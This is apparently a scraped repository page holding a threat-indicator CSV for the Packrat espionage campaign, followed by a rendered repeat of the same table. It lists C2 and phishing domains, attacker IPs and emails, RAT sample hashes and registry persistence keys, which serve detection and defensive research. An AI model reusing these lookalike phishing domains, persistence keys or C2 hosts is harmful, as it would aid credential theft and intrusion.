4 daynews.sytes.net 192.169.243.65 March 3rd, 2015
5 daynews.sytes.net 190.20.180.181 March 1st, 2015
6 taskmgr.serveftp.com 190.210.180.181 August 11th, 2014
7 taskmgr.serveftp.com 201.52.24.126 July 23rd, 2014
8 taskmgr.serveftp.com 186.220.1.84 July 11th 2014
9 taskmgr.servehttp.com 186.220.1.84 June 24th, 2014
10 taskmgr.servehttp.com 201.52.24.126 July 23rd, 2014
11 taskmgr.servehttp.com 186.220.1.84 July 11th 2014
12 taskmgr.servehttp.com 186.220.11.67 August 15th, 2014
13 taskmgr.redirectme.com 201.52.24.126 July 23rd, 2014
14 taskmgr.redirectme.com 186.220.1.84 July 11th 2014
15 ruley.no-ip.org 186.220.1.84 July 11th 2014
16 ruley.no-ip.org 189.100.148.188 September 6th, 2012
17 lolinha.no-ip.org 189.100.148.188 September 6th, 2012
18 wjwj.no-ip.org 189.100.148.188 September 6th, 2012
19 conhost.servehttp.com 186.220.11.67 August 15th, 2014
20 dllhost.servehttp.com 186.220.11.67 August 15th, 2014
21 wjwjwj.no-ip.org 179.208.187.216 March 25th, 2014
22 wjwjwj.no-ip.org 186.220.1.84 June 24th, 2014
23 wjwjwjwj.no-ip.org 179.208.187.216 March 25th, 2014

View File

@@ -0,0 +1,137 @@
uuid,event_id,category,type,value,comment,to_ids,date
035cef0c-ab5b-4870-8a2d-3fffb2002a86,12,Network activity,domain,"www.blackboxmusic.co","",1,20161104
04da6270-0f60-44e0-a68c-bb6d0eb89d84,12,Artifacts dropped,md5,"695db7dd3b1daf89f2c56d59faecc088","CyberGate",1,20161108
075b1d0f-b7b2-4571-bd0c-9a2ad1c98663,12,Artifacts dropped,md5,"93b630891db21a4a2350280a360c713d","CyberGate",1,20161108
078ea337-c004-430a-87d7-982e517f81c4,12,Artifacts dropped,md5,"4a23a1d6779d199aaa582cf0a5868ad1","Adzok",1,20161108
080d5bfb-0924-48a0-8b75-37104a301e1c,12,Network activity,ip-dst,"201.52.24.126","",1,20161104
09e60b2e-a849-4dc3-9910-59cd78bc3f82,12,Artifacts dropped,md5,"5a8975873f52436377d8fb0b5ab0d87a","CyberGate",1,20161108
0a4ead27-a700-45f4-bcd0-b469d002b231,12,Network activity,ip-dst,"189.100.148.188","",1,20161104
0c0abe15-22aa-433f-9a15-0b8196c3a99a,12,Network activity,domain,"venezuela365.com","",1,20161104
0e4cc2f6-8b32-489a-8f86-6279b96ff313,12,Network activity,url,"http://ecuadorenvivo.co/videos/el-meme-que-volvio-loco-a-correa.html","",1,20161104
0fabddd8-3837-4d33-bb62-efc4edfe67a5,12,Network activity,domain,"supportgmai1.com","",1,20161104
1013af0f-98ea-44cf-8c57-d5dfcc2a9398,12,Network activity,domain,"conhost.servehttp.com","",1,20161104
102812f0-1515-475b-85c9-fe3b9f298322,12,Network activity,domain,"mail-account-update.com","",1,20161104
11c2de46-6ded-4948-914e-a8acff9ff027,12,Artifacts dropped,md5,"ce6065346a918a813eeb58bbb0814a23","CyberGate",1,20161108
1242c1d0-3d53-48f2-a30f-f6566a46b262,12,Artifacts dropped,md5,"efc0009d76a2057f86c5f00030378c72","AlienSpy",1,20161108
17548c65-6dd6-473f-b79c-9ad3095fb9b2,12,Artifacts dropped,md5,"a73351623577f44a2b578fed1e78e37e","CyberGate",1,20161108
19da57bf-1c40-4472-a9e1-696a56ff0d12,12,Network activity,domain,"update-outlook.info","",1,20161104
1b9f7074-c66c-472d-8917-0592bd07202e,12,Network activity,domain,"verify-gmail-support-secure.tk","",1,20161104
1c9844bb-53a7-4c6d-859a-864d802fb755,12,Network activity,ip-dst,"198.12.150.249","",1,20161104
1d17b791-20fd-4a0b-b074-36282e6fe9b9,12,Network activity,domain,"support-java.com","",1,20161104
1f129d35-b9b2-42b4-81f6-8903c25c7080,12,Network activity,domain,"taskmgr.serveftp.com","",1,20161108
1fcd075d-0b8f-42d9-852d-31813ae49879,12,Network activity,domain,"chavistas24.com","",1,20161104
2034aaac-cd1a-4f24-9c9e-a622763cc35a,12,Artifacts dropped,md5,"15ebe16cd9500de534d5bfd5eeceaf73","CyberGate",1,20161108
22c32e7b-f0a5-4e57-8821-a080cb880cdb,12,Network activity,domain,"mesvr.com","",1,20161104
2738530c-979b-43ef-a7a3-6e509d38d073,12,Artifacts dropped,regkey,"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msconfig","",1,20161104
29d3b93f-a8c7-46f0-8aaa-d5b1d3a7efa6,12,Network activity,domain,"dllhost.servehttp.com","",1,20161104
2b8e7578-2b1b-4ee4-b690-812825551490,12,Network activity,domain,"deyrep24.ddns.net","C2 server",1,20161108
2bcfdd38-8a5d-4512-b575-9b06096bed81,12,Network activity,domain,"ns1.ukraine.com.ua","",1,20161104
2cd0f135-c88d-4a89-8cd4-bbc6cd3efa0f,12,Artifacts dropped,md5,"01dec1b1d0760d5a1a562edcfeb478d1","CyberGate",1,20161108
2de6d004-f85c-4967-9aaf-f6a2bd9f4349,12,Network activity,ip-dst,"46.246.89.246","",1,20161104
32c1f9d8-b15a-4f28-a91d-1d781b28aaa0,12,Network activity,domain,"n1.login-office365.com","",1,20161104
33a05e11-fe8c-47e0-b8a2-55b568df6adf,12,Network activity,domain,"focusecuador.tk","",1,20161104
341b2a91-d835-4766-8a27-d0a04cf9af90,12,Artifacts dropped,md5,"a74ef893b1bf21c9df6d8e31285db981","CyberGate",1,20161108
378b1659-18cc-484d-aa90-df1a36849693,12,Artifacts dropped,md5,"1e6d0b59d4fb7650453c207688385f3a","CyberGate",1,20161108
395f1ba8-c107-4622-a845-f2a2e2660b64,12,Network activity,domain,"movimientoanticorreista.com","",1,20161104
3a638a7b-6cc4-4cfe-940c-921fb417e79c,12,Artifacts dropped,md5,"c2237e9d415f542ce6e73adb260af123","Xtreme RAT",1,20161108
3b6d91fc-6693-453e-b8d0-9a0955b12a9c,12,Network activity,url,"http://ecuadorenvivo.com/videos/el-meme-que-volvio-loco-a-correa.html","",1,20161104
3cd6d0dd-13e7-40b1-adaf-957bedfc212b,12,Artifacts dropped,md5,"7b2cb5249d704cb1df8d4210e7c3d553","CyberGate",1,20161108
438fd35d-28ff-4669-a2c6-d3606ad95501,12,Payload delivery,email-src,"enripintos123@outlook.es","",1,20161104
440b7b2b-7d18-4a95-a95c-f4d80412535c,12,Artifacts dropped,md5,"e03be1849ad7cecba1e20923074cd22f","CyberGate",1,20161108
475c2ee5-d819-4a55-bb4d-1d909905c039,12,Artifacts dropped,md5,"d2adecc6287dd4d559fe6ce2ce7a7e31","Cybergate",1,20161108
491292ff-d9e0-481e-aed8-575ac817cff9,12,Network activity,domain,"asambleanacional-gob-ec.cu9.co","",1,20161104
4982d975-2425-4c0e-8709-8ea8c3743372,12,Payload delivery,email-src,"no-responder@supportgmai1.com","",1,20161104
4e2e0b4c-8e54-40bc-9432-152d34b9980b,12,Network activity,domain,"24.com","",0,20161104
4e37e013-f1ce-4df9-ae83-f04eb6b18ba9,12,Network activity,domain,"taskmgr.redirectme.com","",1,20161104
50dd1978-ed90-48a0-8fae-f841d7d26c0e,12,Network activity,domain,"cu9.co","",1,20161104
521771b2-16c0-44e8-b1c6-0dedfe52a93f,12,Network activity,url,"http://pancaliente.info/los-negocios-secretos-de-leocenis-garcia-y-gonzalo-tirado","",1,20161104
53063744-8009-4309-823f-44ac089a9f4d,12,Network activity,domain,"formmail.com","",1,20161104
53d09cce-3d68-4a76-bddb-118176b5eda6,12,Artifacts dropped,md5,"2de51e74fd571319bbf763ec62781096","AlienSpy",1,20161108
55ab0c50-6ba9-44f0-bbf5-e30f13396fba,12,Artifacts dropped,md5,"1e4265a0c37773c2372b97bb6630ae57","Adzok",1,20161108
55bc7d1d-b8c1-404a-ba53-0e81f893bf4f,12,Payload delivery,email-src,"movimiento.anti.correista@gmail.com","",1,20161104
568339a3-cddf-4539-8e40-f2d726a5341b,12,Network activity,domain,"ecuadorenvivo.com","",1,20161104
56e407af-b034-469f-833e-4261d12f4e3f,12,Network activity,ip-dst,"179.208.187.216","",1,20161104
576bf524-78bd-47b8-9ae0-54ecea1bb4af,12,Network activity,domain,"ns1.deyrep.com","",1,20161104
581c127f-fca8-4148-9a35-497a8e96ca05,12,External analysis,link,"https://citizenlab.org/2015/12/packrat-report/","",0,20161108
582243bb-0f34-4775-9d56-49798e96ca05,12,Payload type,text,"CyberGate","",0,20161108
582243bb-28a4-4ba0-bb04-49798e96ca05,12,Payload type,text,"Adzok","",0,20161108
582243bb-c8d8-4986-a6f6-49798e96ca05,12,Payload type,text,"Xtreme RAT","",0,20161108
582243bb-f194-4e73-8e86-49798e96ca05,12,Payload type,text,"AlienSpy","",0,20161108
5f6ed532-7034-4529-8f1f-eca4f3ead06a,12,Network activity,domain,"soporte-login-account-yahoo.tk","",1,20161104
613fc81a-9472-402a-864f-ba796bd820f9,12,Network activity,domain,"n4.pancaliente.info","",1,20161104
63f47613-ca7a-4a85-859b-55acf0440a1a,12,Network activity,ip-dst,"50.63.202.57","",1,20161104
64c9eefd-aabd-47be-8a66-56a3f777fca0,12,Network activity,domain,"taskmgr.redirectme.net","",1,20161104
65be605b-ce44-483a-9398-c9b6c1d2584f,12,Network activity,domain,"s1.mgoogle.us","",1,20161104
665a391e-0346-477b-8062-0e093fba3333,12,Artifacts dropped,md5,"a09f100ddc7cf29f8a93a3d7a79c58b9","CyberGate",1,20161108
668f1383-b9db-44fb-ab01-49537c77ad1e,12,Network activity,domain,"blackboxmusic.co","",1,20161104
694b6503-2ef8-4da9-8adf-1eaf5b0393c8,12,Artifacts dropped,md5,"2d722592a4e3c8030410dccccb221ce4","CyberGate",1,20161108
69d8d573-3f23-493b-97f4-8fa6b4cf9f1b,12,Artifacts dropped,md5,"2827450763b55c5e71fda3caaf8e75f9","Xtreme RAT",1,20161108
6cb4f4a0-1cf6-4cf4-98c2-5b9b93ff9867,12,Artifacts dropped,md5,"8fb96dfab7e4c0acb1eb9f4e950ba4b9","AlienSpy",1,20161108
74bc6c34-77bb-4328-9edc-75059585e539,12,Network activity,domain,"mgoogle.us","",1,20161104
77cc5d54-a422-4f1b-ab2f-167cdfde8bef,12,Network activity,domain,"focusecuador.net","",1,20161104
7908fe7c-4346-4810-9f79-3ad2a8b93fd6,12,Network activity,domain,"n2.login-office365.com","",1,20161104
7a7a2e9e-8e1e-45c7-ba5d-c6d6ce59465a,12,Network activity,domain,"ns1.hostinger.ru","",1,20161104
7a948702-dd5c-46da-93e6-37d7bc088693,12,Network activity,ip-dst,"190.20.180.181","",1,20161104
7b018a95-eb5d-4226-a5ca-9e32f4b288e4,12,Network activity,domain,"deyrep.com","",1,20161104
7ca51a3d-b093-497f-accf-00bca0964287,12,Network activity,domain,"ns2.deyrep.com","",1,20161104
809f7cd8-5a6f-4e4e-baca-d148180828b7,12,Network activity,url,"http://mail.asambleanacional.gob.ec","",1,20161104
8149df18-d5b8-4b8f-9ebf-48676f586058,12,Network activity,ip-dst,"193.105.134.27","",1,20161104
823b71a4-5bcc-4c16-bd79-816b1b6e70d9,12,Network activity,domain,"justicia-desvinculados.com","",1,20161104
83aa404a-cb12-407c-993c-1ff9b7fa1947,12,Network activity,domain,"ftp.server.com","",1,20161104
83bc4a8a-fe39-48d7-b26c-f4e4bfe08cde,12,Network activity,domain,"lolinha.no-ip.org","",1,20161104
85d91d34-8222-4b2e-b154-0b394ec75fe3,12,Artifacts dropped,md5,"3a61d64986ee6529cee271ab6754faa5","CyberGate",1,20161108
887aba05-4662-4967-8d93-09cb8b3d7685,12,Network activity,domain,"n1.support-java.com","",1,20161104
88a1c5b7-d445-49fc-aa75-7ee28b069510,12,Payload delivery,email-src,"focusedtior1@gmail.com","",1,20161104
89db0f38-a183-45b8-9503-69828bf29412,12,Network activity,ip-dst,"192.169.243.65","IP address linked to deyrep24.ddns.net",1,20161108
8ae2e6c9-806a-4a57-aa17-aed767339990,12,Artifacts dropped,md5,"d7f34168b1a7dd7cbd8e62a5ab1ebc0e","Xtreme RAT",1,20161108
8d8d0ac6-1cbe-4d9c-9b3c-8b7dbd1a1ce4,12,Artifacts dropped,md5,"779a79c11f581b84e7c81f321fd8d743","CyberGate",1,20161108
8ea723f1-5e6d-4984-80a1-c844988006d9,12,Network activity,url,"http://venezuela365.com/wp-content/uploads/2014/10/tirado-g-300×169.jpg","",1,20161104
8eecda70-e625-413f-b7fc-8451d76f4765,12,Network activity,domain,"ec.cu9.co","",1,20161104
8f38d4c7-dff5-484f-be90-3aaa3fba6753,12,Artifacts dropped,md5,"d2f151312f7dee2483ddcab9766b56db","AlienSpy",1,20161108
9096fec9-6b26-4c94-a9a1-8bfe16caf1b5,12,Artifacts dropped,md5,"8e0f021dcbbfa586a1c6780e77ac0fb6","CyberGate",1,20161108
93541388-7cc4-436a-bf73-1e1584776a59,12,Network activity,domain,"www.movimientoanticorreista.com","",1,20161104
9e0ea90e-1dae-4fd3-9fe2-a95bf8ff29c7,12,Network activity,ip-dst,"190.210.180.181","",1,20161104
9f3c0a52-cf4e-434c-852b-a93df8a857e1,12,Payload delivery,email-src,"claudiobonadio88@gmail.com","",1,20161108
9fbc655c-1010-4057-8af4-d29425574e3e,12,Artifacts dropped,md5,"13d939b2412c6adbab3cc1b539166671","CyberGate",1,20161108
a0787877-1f51-45a2-a268-99585abd3753,12,Network activity,domain,"android-flash.com","",1,20161104
a179e1f8-66e4-4055-a762-ed5d9166afa2,12,Artifacts dropped,md5,"74613eae84347183b4ca61b912a4573f","AlienSpy",1,20161108
a38d5330-38f4-4016-a6a5-82fefed9aacd,12,Network activity,domain,"wjwjwjwj.no-ip.org","",1,20161104
a391d94a-2311-4420-a315-067f450915c2,12,Network activity,domain,"ftp.ftpserver.com","",1,20161104
a723650f-2306-48f3-a588-e57822f92448,12,Artifacts dropped,regkey,"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\Policies","",1,20161104
a8d6eb71-318f-4516-b319-5e50d6996770,12,Artifacts dropped,md5,"dd1101adc86fd282f5f183942cc2f3b7","CyberGate",1,20161108
ab318121-5622-4ea7-aca3-59e972601644,12,Network activity,domain,"n3.pancaliente.info","",1,20161104
abb6b95e-2364-4aad-b826-7c925b587d0a,12,Network activity,domain,"lavozmericana.info","",1,20161104
abc292cf-5485-4189-8c0a-b18d830cc7f2,12,Network activity,domain,"pancaliente.info","",1,20161104
ac5dde92-e97e-4b57-9305-5e439f9bbb40,12,Artifacts dropped,md5,"ea50bf8abcf9c0c40c4490dc15fb0a2a","CyberGate",1,20161108
aea5a3f5-d174-47c1-81a0-c97a5a478e00,12,Network activity,domain,"n1.lavozamericana.info","",1,20161104
b0bd3917-ba04-4d95-a5d3-928993f331a9,12,Artifacts dropped,md5,"a988235ad7d47acbeca5ccb4ea5a1ed5","CyberGate",1,20161108
b0df1407-9653-4f07-8f2e-5cd7f1c1a212,12,Network activity,domain,"n1.update-outlook.info","",1,20161104
b373771f-54f4-4559-8297-52779ee94c28,12,Network activity,domain,"soporte-login-account-gmail.tk","",1,20161104
b5b19817-6112-4eeb-b3d1-666f92b33ee7,12,Network activity,domain,"no.response.delivery.es","",1,20161104
b66ec73a-4faf-4873-bdd8-8fdde6207ca4,12,Network activity,domain,"ecuadorenvivo.co","",1,20161104
b812855c-8fdc-41f2-8857-8966aa84ea89,12,Network activity,domain,"ruley.no-ip.org","",1,20161104
bc40a9ee-df43-4ba3-ad9d-529dc845d04b,12,Network activity,domain,"s2.mgoogle.us","",1,20161104
bd9e3887-abea-465a-9f42-4ca38ea31d17,12,Artifacts dropped,md5,"0ae0038ffe8cf5c3170734a71ff2213d","AlienSpy",1,20161108
c00a3cd4-3530-4a3d-a0b2-4231aad495ad,12,Network activity,domain,"login-office365.com","",1,20161104
c103e0dc-7fb4-4e6d-a3d1-d6dfadc90045,12,Artifacts dropped,md5,"08a3bb5b220eb1e0dc2ecccbbc6859f5","Adzok",1,20161108
c67572b2-b7f4-4f32-9e4d-a8892079fec4,12,Network activity,domain,"wjwjwj.no-ip.org","",1,20161104
c6f40987-2e22-495f-9fcf-ce681c67e901,12,Network activity,domain,"daynews.sytes.net","domain linked to deyrep24.ddns.net",1,20161108
c7d3ba98-9951-45a1-864f-ad1c6c000aad,12,Artifacts dropped,regkey,"HKLM\SOFTWARE\Microsoft\Active","",1,20161104
c891c678-1cf0-4842-bcec-fe93b9479a28,12,Network activity,ip-dst,"50.62.133.49","IP address linked to deyrep24.ddns.net",1,20161108
cbdf99c3-ac02-49e1-bd44-aa95c5e2acac,12,Network activity,domain,"wjwj.no-ip.org","",1,20161104
ced4acdc-8a7e-4766-b6c6-431b37b0e332,12,Payload delivery,email-src,"cfed.bonadio@gmail.com","Phishing source pretending to be Claudio Bonadio",1,20161108
cf896608-add9-45a1-8a66-8a04096b70f1,12,Network activity,domain,"mail.asambleanacional.gob.ec","",1,20161104
cfd9e067-855e-4c38-af7b-b1ec7b9c5e0f,12,Network activity,domain,"support-whatsapp.com","",1,20161104
d036cf1a-59fb-4c11-9da9-cbf99f5733a7,12,Artifacts dropped,md5,"ed8d7ed45b64890b8901b735018318f3","CyberGate",1,20161108
d605e928-93ec-4aec-897e-0de476fe3f0e,12,Network activity,domain,"s1.support","",1,20161104
d736d788-19c3-47d3-85ba-6f1b8a3f0897,12,Network activity,ip-dst,"186.220.1.84","",1,20161104
d79f9f17-548f-4712-afdf-a8dc5dc43be1,12,Network activity,domain,"taskmgr.servehttp.com","",1,20161104
da13fa70-4007-4c44-b611-a890dd8b1f31,12,Artifacts dropped,md5,"ea7bcf58a4ccdecb0c64e56b9998a4ac","Adzok",1,20161108
dad67427-90fd-429f-94cc-15aab9efefc7,12,Artifacts dropped,md5,"bc97437fec7e7e8634c2eabae3cc4832","CyberGate",1,20161108
e4567864-ed20-4a52-8ebc-280bb84bc259,12,Payload delivery,email-src,"no.response.delivery.es@gmail.com","",1,20161104
ec9d62d6-4906-45a7-a781-a4b3939e77bc,12,Network activity,domain,"gmail.com.msg07.xyz","",1,20161104
f4ce5713-8486-4eff-be64-f04899ad0e63,12,Network activity,ip-dst,"186.220.11.67","",1,20161104
f5818138-37c1-412a-8cf7-2d7bcb538367,12,Network activity,domain,"lavozamericana.info","",1,20161104
f7508074-3443-4ceb-a1b6-08e87bc65b44,12,Network activity,domain,"support-login-validate-outlook.tk","",1,20161104
f7dbcb2a-96c1-48d9-8bda-785348f8d91b,12,Artifacts dropped,md5,"6c34d4296126679d9c6a0bc2660dc453","CyberGate",1,20161108
fd6b3ff2-e441-4bc1-ba2d-d3d9dd50ab24,12,Network activity,domain,"ns.update-outlook.info","",1,20161104
1 uuid event_id category type value comment to_ids date
2 035cef0c-ab5b-4870-8a2d-3fffb2002a86 12 Network activity domain www.blackboxmusic.co 1 20161104
3 04da6270-0f60-44e0-a68c-bb6d0eb89d84 12 Artifacts dropped md5 695db7dd3b1daf89f2c56d59faecc088 CyberGate 1 20161108
4 075b1d0f-b7b2-4571-bd0c-9a2ad1c98663 12 Artifacts dropped md5 93b630891db21a4a2350280a360c713d CyberGate 1 20161108
5 078ea337-c004-430a-87d7-982e517f81c4 12 Artifacts dropped md5 4a23a1d6779d199aaa582cf0a5868ad1 Adzok 1 20161108
6 080d5bfb-0924-48a0-8b75-37104a301e1c 12 Network activity ip-dst 201.52.24.126 1 20161104
7 09e60b2e-a849-4dc3-9910-59cd78bc3f82 12 Artifacts dropped md5 5a8975873f52436377d8fb0b5ab0d87a CyberGate 1 20161108
8 0a4ead27-a700-45f4-bcd0-b469d002b231 12 Network activity ip-dst 189.100.148.188 1 20161104
9 0c0abe15-22aa-433f-9a15-0b8196c3a99a 12 Network activity domain venezuela365.com 1 20161104
10 0e4cc2f6-8b32-489a-8f86-6279b96ff313 12 Network activity url http://ecuadorenvivo.co/videos/el-meme-que-volvio-loco-a-correa.html 1 20161104
11 0fabddd8-3837-4d33-bb62-efc4edfe67a5 12 Network activity domain supportgmai1.com 1 20161104
12 1013af0f-98ea-44cf-8c57-d5dfcc2a9398 12 Network activity domain conhost.servehttp.com 1 20161104
13 102812f0-1515-475b-85c9-fe3b9f298322 12 Network activity domain mail-account-update.com 1 20161104
14 11c2de46-6ded-4948-914e-a8acff9ff027 12 Artifacts dropped md5 ce6065346a918a813eeb58bbb0814a23 CyberGate 1 20161108
15 1242c1d0-3d53-48f2-a30f-f6566a46b262 12 Artifacts dropped md5 efc0009d76a2057f86c5f00030378c72 AlienSpy 1 20161108
16 17548c65-6dd6-473f-b79c-9ad3095fb9b2 12 Artifacts dropped md5 a73351623577f44a2b578fed1e78e37e CyberGate 1 20161108
17 19da57bf-1c40-4472-a9e1-696a56ff0d12 12 Network activity domain update-outlook.info 1 20161104
18 1b9f7074-c66c-472d-8917-0592bd07202e 12 Network activity domain verify-gmail-support-secure.tk 1 20161104
19 1c9844bb-53a7-4c6d-859a-864d802fb755 12 Network activity ip-dst 198.12.150.249 1 20161104
20 1d17b791-20fd-4a0b-b074-36282e6fe9b9 12 Network activity domain support-java.com 1 20161104
21 1f129d35-b9b2-42b4-81f6-8903c25c7080 12 Network activity domain taskmgr.serveftp.com 1 20161108
22 1fcd075d-0b8f-42d9-852d-31813ae49879 12 Network activity domain chavistas24.com 1 20161104
23 2034aaac-cd1a-4f24-9c9e-a622763cc35a 12 Artifacts dropped md5 15ebe16cd9500de534d5bfd5eeceaf73 CyberGate 1 20161108
24 22c32e7b-f0a5-4e57-8821-a080cb880cdb 12 Network activity domain mesvr.com 1 20161104
25 2738530c-979b-43ef-a7a3-6e509d38d073 12 Artifacts dropped regkey HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msconfig 1 20161104
26 29d3b93f-a8c7-46f0-8aaa-d5b1d3a7efa6 12 Network activity domain dllhost.servehttp.com 1 20161104
27 2b8e7578-2b1b-4ee4-b690-812825551490 12 Network activity domain deyrep24.ddns.net C2 server 1 20161108
28 2bcfdd38-8a5d-4512-b575-9b06096bed81 12 Network activity domain ns1.ukraine.com.ua 1 20161104
29 2cd0f135-c88d-4a89-8cd4-bbc6cd3efa0f 12 Artifacts dropped md5 01dec1b1d0760d5a1a562edcfeb478d1 CyberGate 1 20161108
30 2de6d004-f85c-4967-9aaf-f6a2bd9f4349 12 Network activity ip-dst 46.246.89.246 1 20161104
31 32c1f9d8-b15a-4f28-a91d-1d781b28aaa0 12 Network activity domain n1.login-office365.com 1 20161104
32 33a05e11-fe8c-47e0-b8a2-55b568df6adf 12 Network activity domain focusecuador.tk 1 20161104
33 341b2a91-d835-4766-8a27-d0a04cf9af90 12 Artifacts dropped md5 a74ef893b1bf21c9df6d8e31285db981 CyberGate 1 20161108
34 378b1659-18cc-484d-aa90-df1a36849693 12 Artifacts dropped md5 1e6d0b59d4fb7650453c207688385f3a CyberGate 1 20161108
35 395f1ba8-c107-4622-a845-f2a2e2660b64 12 Network activity domain movimientoanticorreista.com 1 20161104
36 3a638a7b-6cc4-4cfe-940c-921fb417e79c 12 Artifacts dropped md5 c2237e9d415f542ce6e73adb260af123 Xtreme RAT 1 20161108
37 3b6d91fc-6693-453e-b8d0-9a0955b12a9c 12 Network activity url http://ecuadorenvivo.com/videos/el-meme-que-volvio-loco-a-correa.html 1 20161104
38 3cd6d0dd-13e7-40b1-adaf-957bedfc212b 12 Artifacts dropped md5 7b2cb5249d704cb1df8d4210e7c3d553 CyberGate 1 20161108
39 438fd35d-28ff-4669-a2c6-d3606ad95501 12 Payload delivery email-src enripintos123@outlook.es 1 20161104
40 440b7b2b-7d18-4a95-a95c-f4d80412535c 12 Artifacts dropped md5 e03be1849ad7cecba1e20923074cd22f CyberGate 1 20161108
41 475c2ee5-d819-4a55-bb4d-1d909905c039 12 Artifacts dropped md5 d2adecc6287dd4d559fe6ce2ce7a7e31 Cybergate 1 20161108
42 491292ff-d9e0-481e-aed8-575ac817cff9 12 Network activity domain asambleanacional-gob-ec.cu9.co 1 20161104
43 4982d975-2425-4c0e-8709-8ea8c3743372 12 Payload delivery email-src no-responder@supportgmai1.com 1 20161104
44 4e2e0b4c-8e54-40bc-9432-152d34b9980b 12 Network activity domain 24.com 0 20161104
45 4e37e013-f1ce-4df9-ae83-f04eb6b18ba9 12 Network activity domain taskmgr.redirectme.com 1 20161104
46 50dd1978-ed90-48a0-8fae-f841d7d26c0e 12 Network activity domain cu9.co 1 20161104
47 521771b2-16c0-44e8-b1c6-0dedfe52a93f 12 Network activity url http://pancaliente.info/los-negocios-secretos-de-leocenis-garcia-y-gonzalo-tirado 1 20161104
48 53063744-8009-4309-823f-44ac089a9f4d 12 Network activity domain formmail.com 1 20161104
49 53d09cce-3d68-4a76-bddb-118176b5eda6 12 Artifacts dropped md5 2de51e74fd571319bbf763ec62781096 AlienSpy 1 20161108
50 55ab0c50-6ba9-44f0-bbf5-e30f13396fba 12 Artifacts dropped md5 1e4265a0c37773c2372b97bb6630ae57 Adzok 1 20161108
51 55bc7d1d-b8c1-404a-ba53-0e81f893bf4f 12 Payload delivery email-src movimiento.anti.correista@gmail.com 1 20161104
52 568339a3-cddf-4539-8e40-f2d726a5341b 12 Network activity domain ecuadorenvivo.com 1 20161104
53 56e407af-b034-469f-833e-4261d12f4e3f 12 Network activity ip-dst 179.208.187.216 1 20161104
54 576bf524-78bd-47b8-9ae0-54ecea1bb4af 12 Network activity domain ns1.deyrep.com 1 20161104
55 581c127f-fca8-4148-9a35-497a8e96ca05 12 External analysis link https://citizenlab.org/2015/12/packrat-report/ 0 20161108
56 582243bb-0f34-4775-9d56-49798e96ca05 12 Payload type text CyberGate 0 20161108
57 582243bb-28a4-4ba0-bb04-49798e96ca05 12 Payload type text Adzok 0 20161108
58 582243bb-c8d8-4986-a6f6-49798e96ca05 12 Payload type text Xtreme RAT 0 20161108
59 582243bb-f194-4e73-8e86-49798e96ca05 12 Payload type text AlienSpy 0 20161108
60 5f6ed532-7034-4529-8f1f-eca4f3ead06a 12 Network activity domain soporte-login-account-yahoo.tk 1 20161104
61 613fc81a-9472-402a-864f-ba796bd820f9 12 Network activity domain n4.pancaliente.info 1 20161104
62 63f47613-ca7a-4a85-859b-55acf0440a1a 12 Network activity ip-dst 50.63.202.57 1 20161104
63 64c9eefd-aabd-47be-8a66-56a3f777fca0 12 Network activity domain taskmgr.redirectme.net 1 20161104
64 65be605b-ce44-483a-9398-c9b6c1d2584f 12 Network activity domain s1.mgoogle.us 1 20161104
65 665a391e-0346-477b-8062-0e093fba3333 12 Artifacts dropped md5 a09f100ddc7cf29f8a93a3d7a79c58b9 CyberGate 1 20161108
66 668f1383-b9db-44fb-ab01-49537c77ad1e 12 Network activity domain blackboxmusic.co 1 20161104
67 694b6503-2ef8-4da9-8adf-1eaf5b0393c8 12 Artifacts dropped md5 2d722592a4e3c8030410dccccb221ce4 CyberGate 1 20161108
68 69d8d573-3f23-493b-97f4-8fa6b4cf9f1b 12 Artifacts dropped md5 2827450763b55c5e71fda3caaf8e75f9 Xtreme RAT 1 20161108
69 6cb4f4a0-1cf6-4cf4-98c2-5b9b93ff9867 12 Artifacts dropped md5 8fb96dfab7e4c0acb1eb9f4e950ba4b9 AlienSpy 1 20161108
70 74bc6c34-77bb-4328-9edc-75059585e539 12 Network activity domain mgoogle.us 1 20161104
71 77cc5d54-a422-4f1b-ab2f-167cdfde8bef 12 Network activity domain focusecuador.net 1 20161104
72 7908fe7c-4346-4810-9f79-3ad2a8b93fd6 12 Network activity domain n2.login-office365.com 1 20161104
73 7a7a2e9e-8e1e-45c7-ba5d-c6d6ce59465a 12 Network activity domain ns1.hostinger.ru 1 20161104
74 7a948702-dd5c-46da-93e6-37d7bc088693 12 Network activity ip-dst 190.20.180.181 1 20161104
75 7b018a95-eb5d-4226-a5ca-9e32f4b288e4 12 Network activity domain deyrep.com 1 20161104
76 7ca51a3d-b093-497f-accf-00bca0964287 12 Network activity domain ns2.deyrep.com 1 20161104
77 809f7cd8-5a6f-4e4e-baca-d148180828b7 12 Network activity url http://mail.asambleanacional.gob.ec 1 20161104
78 8149df18-d5b8-4b8f-9ebf-48676f586058 12 Network activity ip-dst 193.105.134.27 1 20161104
79 823b71a4-5bcc-4c16-bd79-816b1b6e70d9 12 Network activity domain justicia-desvinculados.com 1 20161104
80 83aa404a-cb12-407c-993c-1ff9b7fa1947 12 Network activity domain ftp.server.com 1 20161104
81 83bc4a8a-fe39-48d7-b26c-f4e4bfe08cde 12 Network activity domain lolinha.no-ip.org 1 20161104
82 85d91d34-8222-4b2e-b154-0b394ec75fe3 12 Artifacts dropped md5 3a61d64986ee6529cee271ab6754faa5 CyberGate 1 20161108
83 887aba05-4662-4967-8d93-09cb8b3d7685 12 Network activity domain n1.support-java.com 1 20161104
84 88a1c5b7-d445-49fc-aa75-7ee28b069510 12 Payload delivery email-src focusedtior1@gmail.com 1 20161104
85 89db0f38-a183-45b8-9503-69828bf29412 12 Network activity ip-dst 192.169.243.65 IP address linked to deyrep24.ddns.net 1 20161108
86 8ae2e6c9-806a-4a57-aa17-aed767339990 12 Artifacts dropped md5 d7f34168b1a7dd7cbd8e62a5ab1ebc0e Xtreme RAT 1 20161108
87 8d8d0ac6-1cbe-4d9c-9b3c-8b7dbd1a1ce4 12 Artifacts dropped md5 779a79c11f581b84e7c81f321fd8d743 CyberGate 1 20161108
88 8ea723f1-5e6d-4984-80a1-c844988006d9 12 Network activity url http://venezuela365.com/wp-content/uploads/2014/10/tirado-g-300×169.jpg 1 20161104
89 8eecda70-e625-413f-b7fc-8451d76f4765 12 Network activity domain ec.cu9.co 1 20161104
90 8f38d4c7-dff5-484f-be90-3aaa3fba6753 12 Artifacts dropped md5 d2f151312f7dee2483ddcab9766b56db AlienSpy 1 20161108
